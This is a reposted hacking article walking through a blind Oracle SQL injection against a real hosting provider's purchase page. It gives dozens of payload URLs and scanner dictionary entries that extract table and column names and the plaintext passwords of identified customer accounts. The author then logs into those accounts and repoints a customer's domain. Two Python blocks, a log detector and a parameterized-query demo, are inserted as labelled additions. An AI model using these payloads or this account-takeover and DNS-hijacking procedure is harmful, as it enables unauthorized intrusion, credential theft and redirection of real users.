Wan Net Oracle Injection Vulnerability Details

xiaoxiao2021-03-06  57

This article is reposted from: Hacking base

Original: Wan Net's Embarrassment - Wan Net Oracle Injection Vulnerability Exposure

Some time ago, after finishing the project I had in hand, I was free to wander around online and see what my friends had been up to.

One had opened a forum, another welcomed everyone to come and download stuff, and all of them were on .com or .com.cn domain names, which made me very envious. When will I have my own host and top-level domain name ... lost in fantasy ... Thinking of applying for a host and a domain name, I naturally thought of China Wan Net (too famous in China ^_^). Let's go and see how much money it takes. I opened the home page of Wanwang. Wow, a standard ASP.NET host costs 1600 yuan a year ... a domain is 200. I was just about to add it up when I saw the member login interface in the upper right corner of the homepage.

My habit of doing security work stirred my "thief's" heart again. Let's take a look at what I can find. Finding a vulnerability and getting a member account would be even better; anyway, there is nothing else to do now.

Browsing the website, I read: Wan Net (www.net.cn) is China's largest domain name and website hosting service provider, the flagship of China's Internet service industry. It has system engineers with more than 10 years of Unix experience, Cisco router experts, Oracle database experts, Microsoft MCSE certified engineers, Java / ASP / Perl / C programming masters and network security experts. Cough ... sweat. I don't know how many server security measures a big website like this has in place. Maybe there is a mapping, plus N advanced IDS and FW, maybe there is also a honeypot waiting, and the patches were surely applied early. I took out a port scanning tool and swept it ... depressing ... It seems there is no hope of intruding directly through the server ...

Browsing further, I noticed something: hey, Wan Net's site is written in ASP. You must know about ASP + MSSQL injection; a lot of sites have suffered from it. Does this big website have the problem too? Never mind, try it first. I found a link:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341

This is a page for purchasing a virtual host. I first tested it with the classic and 1=1 and and 1=2 method. Dizzy ~ both returned a type mismatch: 'CDBL' error. Oh, is it really no good? Still not willing to give up, let's take a look at what database it uses. Add a single quote after the parameter, submit, and the page returns an error:

OraOLEDB error '80004005'

ORA-01756: Strings in parentheses do not end correctly

/has_client/buy/vir_host/vir_host1_sb.asp, line 285

Haha, so it uses Oracle. No wonder. Generally, a site on an Oracle database that returns this kind of error may have a problem. This is similar to the unclosed quotation mark error in MSSQL, but when MSSQL gives such an error we can almost certainly say there is an injection vulnerability, while with Oracle we must determine it further.

My spirits lifted and I continued with further checks. Note that the following steps are the foundation of the later intrusion and are very important.

We submit these separately:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from all_tables)%20and%20'1'='1

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from user_tables)%20and%20'1'='1

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from user_tab_columns)%20and%20'1'='1

These check whether the Oracle system tables we guessed exist: all_tables, user_tables and user_tab_columns. We will rely on these system tables later. If they are not there, there is no way to play.

The pages all returned successfully, which indicates that the guessed system tables exist and also shows that the SQL statement we submitted was processed by the program. At this point it is confirmed that this page does have a SQL injection vulnerability. Yeah!

After sending N messages to Wan Net without any reaction, I started further penetration.

Below, we start the formal injection. Of course, if the system table pages had not returned correctly, we most likely could not succeed. ^_^

First let us sort out the ideas.

The most critical thing is the user's account information, and most critical of all are the user's username and password. That is our primary goal. How do we locate this information in the Oracle database? Let's do this: the user_tab_columns system table stores all the column names of all user tables. We will start from here. Submit:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from user_tab_columns%20where%20column_name%20like%20'%25Password%25')%20and%20'1'='1

This queries whether the user_tab_columns table has column names containing the Password string.

The page returns correctly, haha, indicating that there is a column name containing the PASSWORD string.

We can also test PWD, Admin, Pass and other sensitive fields. Here we start from password. Now we know that there is a column name containing the Password string. Then how do we know which table contains this column name? We do this, submit:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,1)='a')%20and%20'1'='1

This checks whether there is a table whose name starts with a that has a column name containing the PASSWORD string. If there is, the page returns correctly. Otherwise it reports an error:

Microsoft VBScript runtime error error '800A000D'

Type mismatch: 'CDBL'

/has_client/include/vh_getproperty.asp, line 46

But going one by one is really ... too tiring ... 26 letters ... Here I use NBSI's background management address scan function to perform automatic detection. We do this:

The addresses scanned by NBSI's background management address scan are controlled by the file dict_admin.txt. We replace the contents of the file with:

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,1)='a')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,1)='b')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,1)='c')%20and%20'1'='1

...

Then we fill in the scan address in the program: http://www.net.cn/has_client/buy/vir_host. Click start scanning. NBSI starts to GET the addresses we set. There is a problem here: NBSI also displays 500 errors in the result bar below, and we only need it to display the addresses that return 200 OK. What to do? We take out WPE Pro. WPE Pro is a tool that intercepts and modifies data packets in real time. We use it to change the returned 500 errors to 404 pages, so NBSI will not display the 500 error addresses below. I will not go into WPE's specific usage here; there are tutorials online.

In this way, our guessing efficiency improves. The rest is the same.
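Seen from the server side, the scan described above is easy to spot: rewriting 500 responses to 404 with WPE changes only what NBSI sees, so the web server log still records every 500. The following added example (not from the original article) flags clients whose requests to one page carry a quote plus SQL keywords and mostly end in server errors; the log layout, paths, addresses and thresholds are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# A quote followed by a query keyword or an Oracle dictionary view named in the article.
SQLI_HINT = re.compile(
    r"'.*\b(select|substr|all_tables|user_tables|user_tab_columns)\b", re.I)


def constructed_log():
    """Build sample log lines (constructed, not real traffic).

    Assumed field order, IIS W3C style:
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    """
    lines = [
        "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
        "2003-01-01 09:59:58 203.0.113.9 GET /shop/item.asp id=10341 200",
        "2003-01-01 09:59:59 203.0.113.9 GET /shop/find.asp q=o'brien 200",
    ]
    for i, letter in enumerate("abcdefghijklmnopqrstuvwxyz"):
        query = ("id=10341'and%200<>(select%20count(*)%20from%20user_tab_columns"
                 "%20where%20substr(table_name,1,1)='" + letter + "')%20and%20'1'='1")
        status = "200" if letter == "c" else "500"  # one true answer, 25 false
        lines.append(
            f"2003-01-01 10:00:{i:02d} 198.51.100.7 GET /shop/item.asp {query} {status}")
    return lines


def find_probing_clients(lines, min_requests=10, min_error_ratio=0.5):
    """Return {(client_ip, path): (suspicious_hits, server_errors)} for clients
    that sent many SQL-looking queries to one page and mostly got 5xx back."""
    stats = defaultdict(lambda: [0, 0])
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # header or malformed line
        _, _, ip, _, path, query, status = fields
        if SQLI_HINT.search(unquote(query)):
            entry = stats[(ip, path)]
            entry[0] += 1
            entry[1] += status.startswith("5")
    return {key: (hits, errors) for key, (hits, errors) in stats.items()
            if hits >= min_requests and errors / hits >= min_error_ratio}


if __name__ == "__main__":
    for (ip, path), (hits, errors) in find_probing_clients(constructed_log()).items():
        print(f"{ip} probed {path}: {hits} SQL-looking requests, {errors} server errors")
```

The benign request containing an apostrophe (q=o'brien) is not counted, because the pattern requires a keyword after the quote.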

By guessing, we found that tables starting with C, D, H, M, S and V contain a sensitive field. Let's look at them one by one. Tiring :)

Let's look at C first.

There may be a lot of tables starting with C in the database. Which one is the one we need? We continue to guess the second character. Replace the contents of the dict_admin.txt file (hereinafter referred to as the admin file) using the replace-all feature:

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,2)='ca')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,2)='cb')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,2)='cc')%20and%20'1'='1

...

Run the detection again. OK, the first two characters we need are CU. Then detect the third character ... and so on in a loop. Finally we find that the table containing the sensitive column name is CustomerMST. Seeing Customer ... hey, this looks promising. Of course, once you have guessed five characters you can submit:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from user_tables where table_name like '%25xxxxx%25' and length(table_name)=n) and '1'='1

This determines the length of the table name being guessed. This is more accurate and faster.

Once the table name is guessed, you can submit:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from user_tables where table_name='Customermst') and '1'='1

to confirm. The page returns correctly. OK :)

Keep going. So far we still don't know the specific column names. Let's start guessing the column names of the Customermst table. Since Oracle has no way to brute out the fields directly with a "bang" as MSSQL does, we can only guess. Tiring ... Fortunately we have the homemade, crude NBSI + WPE detector ... *_*. Enough chatter, let's guess the column names. Change the content of the admin file to:

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,1)='a')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,1)='b')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,1)='c')%20and%20'1'='1

...

This checks, by guessing, which letters the column names in the Customermst table start with. If the page returns correctly, that is, returns 200 OK, such a column exists.

Detection shows that there are column names starting with A, B, C, E, F, G, I, L, M, O, P, R, S and U. Dizzy, so many ... No way around it, take it slowly. Let's first look at the ones beginning with A:

The method here is similar to the method for guessing the table name. Change the content of the admin file to:

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,2)='aa')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,2)='ab')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,2)='ac')%20and%20'1'='1

...

OK, the first two characters are Ar, continue ... Finally, the name is Areaid. Note that when detecting one position there may be multiple results, which means there are multiple column names. For example, when detecting the second character after B, both Bi and Bu returned 200 OK, which means there are column names starting with BI and BU. Proceeding in this way, we finally got all the column names of the Customermst table (wiping sweat ...):

AreaID

Birthday

Bizid

Businessstatus

Channel_STAFFID

CityID

Contact

COUNTRY

Customerid

CustomerIndustry

Customerorigintype

Email

Emailbackup

...

Password

...

UserID

...

From the names, you can tell that the three fields Customerid, Password and Userid are the most important.

Wan Net uses a numeric ID and a password when logging in. So which of these two IDs is used to log in? We do this: in the login box on the Wanwang home page, you can look up a user's numeric ID by user name. Yep ... But what user name? We know nothing about what the data looks like. Browsing the homepage, I found a new customer recommendation section at the bottom. Looking carefully, there is a real estate portal - SouFun http://www.soufun.com/. Well, let's use the name Soufun ~ ^_^

OK, the ID of the Soufun user is 10529112. Let's determine which field is the ID field. Submit:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from customermst where customerid='10529112')%20and%20'1'='1

Wow, the page does not return correctly; it returns an error. It seems it is not this field. Submit again:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from customermst where userid='10529112')%20and%20'1'='1

OK, hey, this page returns correctly. It seems that the userid field is the user login ID. By the same method, the Customerid field turns out to be the user name.

Now that the field properties are known, let's start guessing the password, still using this user. Of course, it is guessing again. At last I can guess the password, hehe. Not tired. Change the contents of the admin file to:

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='a')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='b')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='c')%20and%20'1'='1

...

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='0')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='1')%20and%20'1'='1

vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='2')%20and%20'1'='1

...

Here you have to add the Arabic digits as well, since a password is usually letters plus digits :). The above guesses the first character of the password of the user with ID 10529112. After a few seconds, the first character of the password comes out: it is n. Continue to guess the second; the method is the same as the method for guessing names, and the only difference is that there will not be multiple results here. Finally, the password of ID 10529112 is n****. I am dizzy. The password is not encrypted ... Database and security experts ...?

With the password guessed, come on, let's see, hehe.

Haha, login OK! ... The available balance is actually -130 yuan ..., dizzy! Can it be overdrawn? Drafting doll. Not afraid! Find the money field, Update! Hey ... Unfortunately I tried N times and don't know how to do Update and Insert correctly, 5555555. If any master has a good way, let's exchange ideas :)

Of course, after logging in we have all the rights of this account. Let's take a look at paid product management ... what is this stuff, dizzy! Let's take a look at this user's financial information:

Well ... open the most recent transaction. It turned out that 130 yuan was transferred to 10144167. Is the account 10144167 rich? :P

I worked out the password of 10144167, u******, and logged in. Haha, it turned out to be a domain name distribution alliance partner, a rich one ~ balance 329 ^_^. Open paid product management, haha, so many domain names ~ :P

Open the domain name resolution service at the bottom of the page. HOHO, I found the Chinese general domain name registration - Soufang.com.China. Click, and I came to the domain name resolution service page of SouFun.China, where we can change the resolution of SouFun.com.China to control the domain name.

At this point, my mind was no longer on just getting a member account, because this hazard is too big. Think about it: once we have a user's account and password and log in, we can easily change where the purchased domain name points and send it to a location we designate. Imagine a malicious attacker pointing the domain name of a business site to a fake site of his own; then the account information of users logging in to this business site has no security to speak of. Visits to the websites behind these domain names would all be in a mess. For users who purchased the virtual host service, the harm is that the attacker can fully control the website through the website management system provided by Wanwang. This hazard needs no elaboration.

For Wan Net, all of its business may be affected. The data can be arbitrarily obtained and tampered with. I think no customer would dare to apply for services, huh, huh. For example, let me use the account above that has a lot of domain names for a demonstration. I want to resolve the domain name szsxmd.gd.cn to the famous www.xfocus.net (Security Focus). First, I ping www.xfocus.net and get the IP 202.106.127.50. Then I enter the domain name resolution business and add a record in the resolution service of szsxmd.gd.cn, specifying the resolution IP 202.106.127.50.

After a few hours, the domain name resolution takes effect. When we visit szsxmd.gd.cn, we find that we have arrived at the Security Focus page :)

When pinging szsxmd.gd.cn on the command line, the address resolves to 202.106.127.50 :)

The other hazards are obvious and relatively large, so I will not do any more active demonstrations.

The database can be said to be the most important part of a site. Through this injection vulnerability, we can control the data in the database, not only the user account information; all the data in the database we can get, though it is physical labor. When UTL_FILE permission is open to the public group, files on the server can also be read with a UNION query, which is somewhat similar to load_file() in PHP + MySQL injection. Of course, you can also perform Update. But with Oracle injection I am still a rookie; I have not managed updating or inserting data or more advanced injection attacks. And Oracle injection can only guess, and there is no automation tool. I used NBSI's background scan function and WPE to improve efficiency. But I believe there are many masters, and automated tools will appear soon. ^_^

Here are some of the statements used in the injection:

0<>(select count(*) from all_tables) and '1'='1
Guess whether the all_tables system table exists; confirms the injection.

0<>(select count(*) from user_tab_columns where column_name like '%25column keyword%25') and '1'='1
Guess whether there is a column name that contains the defined keyword.

0<>(select count(*) from user_tab_columns where column_name like '%25column keyword%25' and substr(table_name,1,1)='a') and '1'='1
Guess whether there is a table starting with a that contains the keyword column. That is, guessing starts one character at a time.

0<>(select count(*) from user_tables where table_name like '%25table name keyword%25' and length(table_name)=n) and '1'='1
Guess the length of the table name containing the keyword.

0<>(select count(*) from user_tab_columns where table_name='table name' and substr(column_name,1,1)='a') and '1'='1
Guess the column name.

0<>(select count(*) from table name where column name 1='XXXXXXX' and substr(column name 2,1,1)='a') and '1'='1
Guess the data.

So, what is the principle of the Oracle injection vulnerability? Here I will introduce it. Take the page we injected:

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341

The query statement in the source code of the ASP program may be:

select * from table where packageid='10341'

Because this is a non-open-source program, we as attackers have no way of knowing the source code of the ASP program and can only determine its approximate structure from the returned error information. So this is only my rough guess.

Enough chatter, let's analyze. When we access this page, the ASP program queries the data in the table named table according to the parameter 10341 submitted in the URL and returns it to us. From our testing, this parameter is put into the query statement without any filtering, which gives us our opening. When we submit

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from all_tables) and '1'='1

the query statement in the ASP program becomes this:

select * from table where packageid='10341' and 0<>(select count(*) from all_tables) and '1'='1'

This way we succeed in inserting the query we want into the original query statement of the ASP program. This is different from MSSQL: we can't use the comment symbol to comment out the rest of the statement, so the trailing and '1'='1 is there to balance the quotes, so that the entire query statement is valid and the page is returned. For example, with

http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and 0<>(select count(*) from all_tables) and '1'='1' and 'x'='x

the entire page is also returned normally. ^_^

Preventing this injection is actually simple: as long as the parameters submitted in the URL are strictly filtered, removing characters such as single quotes, SQL keywords and so on, the attacker has no chance. The specific approach can be to check the string after the ? in the submitted URL and, on finding a single quotation mark, semicolon, SQL keyword, etc., immediately jump to a custom error page. Personally I think this is a better way. Especially for non-open-source programs, attacks then become almost a dead end.
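An added example, not code from the original article: the string-built query the article infers, next to the same lookup with a bound parameter and a numeric allow-list check, which is more dependable than filtering out quotes and keywords. SQLite stands in for Oracle so it runs offline (sqlite_master plays the role of all_tables); the table, column and function names are assumptions.

```python
import sqlite3

# The article's probe shape, adapted to SQLite's catalog table (constructed values).
TRUE_PROBE = "10341' and 0<>(select count(*) from sqlite_master) and '1'='1"
FALSE_PROBE = ("10341' and 0<>(select count(*) from sqlite_master "
               "where name='no_such_table') and '1'='1")


def make_db():
    """In-memory stand-in for the purchase page's table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE package (packageid TEXT PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO package VALUES ('10341', 'standard host')")
    return db


def lookup_concatenated(db, packageid):
    """Vulnerable: the parameter is pasted into the SQL text, as the article infers."""
    sql = "SELECT name FROM package WHERE packageid = '" + packageid + "'"
    return db.execute(sql).fetchall()


def lookup_bound(db, packageid):
    """Hardened: the value is bound, so it can never become part of the SQL text."""
    return db.execute(
        "SELECT name FROM package WHERE packageid = ?", (packageid,)).fetchall()


def lookup_validated(db, packageid):
    """Allow-list check on top of binding: the id must be 1 to 10 ASCII digits."""
    if not (packageid.isascii() and packageid.isdigit() and len(packageid) <= 10):
        raise ValueError("packageid must be numeric")
    return lookup_bound(db, packageid)


def answers_injected_condition(lookup, db):
    """True if the page's result depends on the truth of the injected condition,
    which is exactly the yes/no signal the article's guessing relies on."""
    try:
        return lookup(db, TRUE_PROBE) != lookup(db, FALSE_PROBE)
    except ValueError:
        return False  # input rejected before reaching the database


if __name__ == "__main__":
    for fn in (lookup_concatenated, lookup_bound, lookup_validated):
        print(fn.__name__, "answers injected condition:",
              answers_injected_condition(fn, make_db()))
```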

Network security is multifaceted, and every link must be attended to. You can use a chain as a metaphor: if any link in the chain has a problem, the whole chain is broken. Just like this vulnerability: although it is just a small problem, its impact is very large, and the pointing of Wanwang customers' domains can easily be changed. If I point a lot of domain names to a certain site, then this site is equivalent to. So network security is not a matter for one person or a few people; it needs all of us to do it well from top to bottom.

In addition, after experiencing a lot of worm and virus attacks, everyone now generally pays attention to server security and has deployed FW and IDS, and the telecom operators have also blocked some ports. Some sites have only port 80 open. So the security of the code running on the server is very important. A small slip in a small place is likely to cause a global collapse. Defense technology is constantly progressing, and attack methods are also constantly being renewed. Today there is SQL injection; what will there be tomorrow? Always paying attention to the latest attack methods is, I think, very important for an excellent administrator.

Unfortunately, many programmers now have no security awareness when writing code, and administrators just place the finished code on the server and only look after server security (our company is like this, huh, huh), so vulnerabilities in the code become the breakthrough point. I have followed security issues since high school and now work in this area. It can be said that the network now is much safer than before, but technology is progressing, and safe today does not mean safe tomorrow.

Security is an eternal topic. I personally feel that those worms and viruses are the most powerful weapon for strengthening network administrators' security awareness, and I believe that attacks exploiting code defects will also strengthen programmers' security awareness when writing code. ^_^

Finally, I hope that Wan Net will fix this vulnerability; for experts, solving this problem may take less than 5 minutes. In addition, strengthen the security of the data in your own database, add a bine. Also, is your email server all right? By the way, many sites in China have injection vulnerabilities, such as XX home, XX department, etc.

Thank you for your patience in reading my article. My level is limited; if there are any mistakes, you are welcome to correct them. My MSN: War3apollo@hotmail.com. For the world outside, I will always be a rookie :).

Please credit the original address when reposting: https://www.9cbs.com/read-91084.html
